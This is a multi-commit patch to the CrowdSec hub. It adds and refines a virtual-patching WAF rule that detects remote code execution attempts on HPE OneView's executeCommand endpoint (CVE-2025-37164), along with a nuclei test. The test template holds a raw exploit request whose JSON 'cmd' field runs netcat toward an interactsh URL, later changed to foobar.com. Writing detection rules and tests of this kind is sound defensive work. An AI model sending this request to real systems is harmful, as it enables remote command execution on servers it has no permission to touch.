From 668036f1c8c76bf3b163193784701ea606e240fe Mon Sep 17 00:00:00 2001 From: crowdsec-automation <63358111+crowdsec-automation@users.noreply.github.com> Date: Mon, 29 Dec 2025 16:17:11 +0100 Subject: [PATCH 01/12] Add vpatch-CVE-2025-37164 rule --- .../crowdsecurity/vpatch-CVE-2025-37164.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml new file mode 100644 index 00000000000..c16fecec96d --- /dev/null +++ b/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml @@ -0,0 +1,31 @@ +## autogenerated on 2025-12-29 15:17:08 +name: crowdsecurity/vpatch-CVE-2025-37164 +description: 'Detects remote code execution attempts in HPE OneView via executeCommand endpoint.' +rules: + - and: + - zones: + - URI + transform: + - lowercase + match: + type: contains + value: /rest/id-pools/executecommand + - zones: + - RAW_BODY + transform: + - lowercase + match: + type: contains + value: '"cmd":' + +labels: + type: exploit + service: http + confidence: 3 + spoofable: 0 + behavior: 'http:exploit' + label: 'HPE OneView - RCE' + classification: + - cve.CVE-2025-37164 + - attack.T1190 + - cwe.CWE-94 From 46331897c074762e97f7b6b71d97561a52a2241c Mon Sep 17 00:00:00 2001 From: crowdsec-automation <63358111+crowdsec-automation@users.noreply.github.com> Date: Mon, 29 Dec 2025 16:17:12 +0100 Subject: [PATCH 02/12] Add vpatch-CVE-2025-37164 test config --- .appsec-tests/vpatch-CVE-2025-37164/config.yaml | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 .appsec-tests/vpatch-CVE-2025-37164/config.yaml diff --git a/.appsec-tests/vpatch-CVE-2025-37164/config.yaml b/.appsec-tests/vpatch-CVE-2025-37164/config.yaml new file mode 100644 index 00000000000..6aa2a6a1731 --- /dev/null +++ b/.appsec-tests/vpatch-CVE-2025-37164/config.yaml @@ -0,0 +1,5 @@ +## autogenerated on 2025-12-29 15:17:08 +appsec-rules: + - ./appsec-rules/crowdsecurity/base-config.yaml + - ./appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml +nuclei_template: CVE-2025-37164.yaml From bfdf4230b73a0800246fb17eac3a4bae3821cb34 Mon Sep 17 00:00:00 2001 From: crowdsec-automation <63358111+crowdsec-automation@users.noreply.github.com> Date: Mon, 29 Dec 2025 16:17:14 +0100 Subject: [PATCH 03/12] Add CVE-2025-37164.yaml test --- .../vpatch-CVE-2025-37164/CVE-2025-37164.yaml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 .appsec-tests/vpatch-CVE-2025-37164/CVE-2025-37164.yaml diff --git a/.appsec-tests/vpatch-CVE-2025-37164/CVE-2025-37164.yaml b/.appsec-tests/vpatch-CVE-2025-37164/CVE-2025-37164.yaml new file mode 100644 index 00000000000..e7ebb98bc6b --- /dev/null +++ b/.appsec-tests/vpatch-CVE-2025-37164/CVE-2025-37164.yaml @@ -0,0 +1,26 @@ +## autogenerated on 2025-12-29 15:17:08 +id: CVE-2025-37164 +info: + name: CVE-2025-37164 + author: crowdsec + severity: info + description: CVE-2025-37164 testing + tags: appsec-testing +http: + - raw: + - | + PUT /rest/id-pools/executeCommand HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + X-API-Version: 3800 + Accept-Encoding: gzip + + { + "cmd":"nc {{interactsh-url}}", + "result":0 + } + cookie-reuse: true + matchers: + - type: status + status: + - 403 From c7a98805c547608acfdd1f9499dab1515c81f35d Mon Sep 17 00:00:00 2001 From: crowdsec-automation <63358111+crowdsec-automation@users.noreply.github.com> Date: Mon, 29 Dec 2025 16:17:16 +0100 Subject: [PATCH 04/12] Add vpatch-CVE-2025-37164 rule to vpatch collection --- collections/crowdsecurity/appsec-virtual-patching.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/collections/crowdsecurity/appsec-virtual-patching.yaml b/collections/crowdsecurity/appsec-virtual-patching.yaml index 40e67fb33ef..47de455879a 100644 --- a/collections/crowdsecurity/appsec-virtual-patching.yaml +++ b/collections/crowdsecurity/appsec-virtual-patching.yaml @@ -146,6 +146,7 @@ appsec-rules: - crowdsecurity/vpatch-CVE-2025-9316 - crowdsecurity/vpatch-CVE-2025-11700 - crowdsecurity/vpatch-CVE-2025-13315 +- crowdsecurity/vpatch-CVE-2025-37164 author: crowdsecurity contexts: - crowdsecurity/appsec_base From 6e80e3df392d524ca4250fc3b499adeb37e33ada Mon Sep 17 00:00:00 2001 From: Thibault Koechlin Date: Wed, 14 Jan 2026 16:19:50 +0100 Subject: [PATCH 05/12] ci From 4bc67451a39fc482c377d02eec5bc9f01667474d Mon Sep 17 00:00:00 2001 From: "Thibault \"bui\" Koechlin" Date: Wed, 21 Jan 2026 15:34:24 +0100 Subject: [PATCH 06/12] Update vpatch-CVE-2025-37164.yaml --- appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml index c16fecec96d..072005a9380 100644 --- a/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml +++ b/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml @@ -11,7 +11,7 @@ rules: type: contains value: /rest/id-pools/executecommand - zones: - - RAW_BODY + - RAW_REQUEST_BODY transform: - lowercase match: From 5c9cb2ec41d5d7825982f1fa7a9bb2313c5df2e2 Mon Sep 17 00:00:00 2001 From: "Thibault \"bui\" Koechlin" Date: Wed, 21 Jan 2026 15:35:45 +0100 Subject: [PATCH 07/12] Update zone from RAW_REQUEST_BODY to RAW_BODY --- appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml index 072005a9380..c16fecec96d 100644 --- a/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml +++ b/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml @@ -11,7 +11,7 @@ rules: type: contains value: /rest/id-pools/executecommand - zones: - - RAW_REQUEST_BODY + - RAW_BODY transform: - lowercase match: From 70e824c86c022cad75d7a9cab7afc0e69b1e9b99 Mon Sep 17 00:00:00 2001 From: Sebastien Blot Date: Wed, 21 Jan 2026 15:48:25 +0100 Subject: [PATCH 08/12] fix escaping --- appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml index c16fecec96d..9ed4bcdbe29 100644 --- a/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml +++ b/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml @@ -16,7 +16,7 @@ rules: - lowercase match: type: contains - value: '"cmd":' + value: '\"cmd\":' labels: type: exploit From b9104644261501bb93eeac4150aba68f01a8e866 Mon Sep 17 00:00:00 2001 From: AlteredCoder <64792091+AlteredCoder@users.noreply.github.com> Date: Wed, 18 Feb 2026 15:51:39 +0100 Subject: [PATCH 09/12] Update CVE-2025-37164.yaml --- .appsec-tests/vpatch-CVE-2025-37164/CVE-2025-37164.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.appsec-tests/vpatch-CVE-2025-37164/CVE-2025-37164.yaml b/.appsec-tests/vpatch-CVE-2025-37164/CVE-2025-37164.yaml index e7ebb98bc6b..a89f6cd8312 100644 --- a/.appsec-tests/vpatch-CVE-2025-37164/CVE-2025-37164.yaml +++ b/.appsec-tests/vpatch-CVE-2025-37164/CVE-2025-37164.yaml @@ -16,7 +16,7 @@ http: Accept-Encoding: gzip { - "cmd":"nc {{interactsh-url}}", + "cmd":"nc foobar.com", "result":0 } cookie-reuse: true From 3c13ceb1c68ba396ba5d92f740e74dde9cb72dfe Mon Sep 17 00:00:00 2001 From: AlteredCoder <64792091+AlteredCoder@users.noreply.github.com> Date: Wed, 18 Feb 2026 15:54:04 +0100 Subject: [PATCH 10/12] Update vpatch-CVE-2025-37164.yaml --- appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml index 9ed4bcdbe29..5857f2e9ce3 100644 --- a/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml +++ b/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml @@ -11,12 +11,14 @@ rules: type: contains value: /rest/id-pools/executecommand - zones: - - RAW_BODY + - BODY_ARGS transform: - lowercase + variable: + - json.cmd match: - type: contains - value: '\"cmd\":' + type: regex + value: ".*" labels: type: exploit From 668b9437e9831efbff4721a17defa64df6df9bb3 Mon Sep 17 00:00:00 2001 From: AlteredCoder <64792091+AlteredCoder@users.noreply.github.com> Date: Wed, 18 Feb 2026 15:58:31 +0100 Subject: [PATCH 11/12] Update vpatch-CVE-2025-37164.yaml --- appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml index 5857f2e9ce3..bc28a555b5a 100644 --- a/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml +++ b/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml @@ -14,7 +14,7 @@ rules: - BODY_ARGS transform: - lowercase - variable: + variables: - json.cmd match: type: regex From c14caecc432a2a9348685f6c980cb5b4a2393203 Mon Sep 17 00:00:00 2001 From: AlteredCoder <64792091+AlteredCoder@users.noreply.github.com> Date: Wed, 18 Feb 2026 16:02:39 +0100 Subject: [PATCH 12/12] Update vpatch-CVE-2025-37164.yaml --- appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml index bc28a555b5a..cc691894037 100644 --- a/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml +++ b/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml @@ -18,7 +18,7 @@ rules: - json.cmd match: type: regex - value: ".*" + value: ".+" labels: type: exploit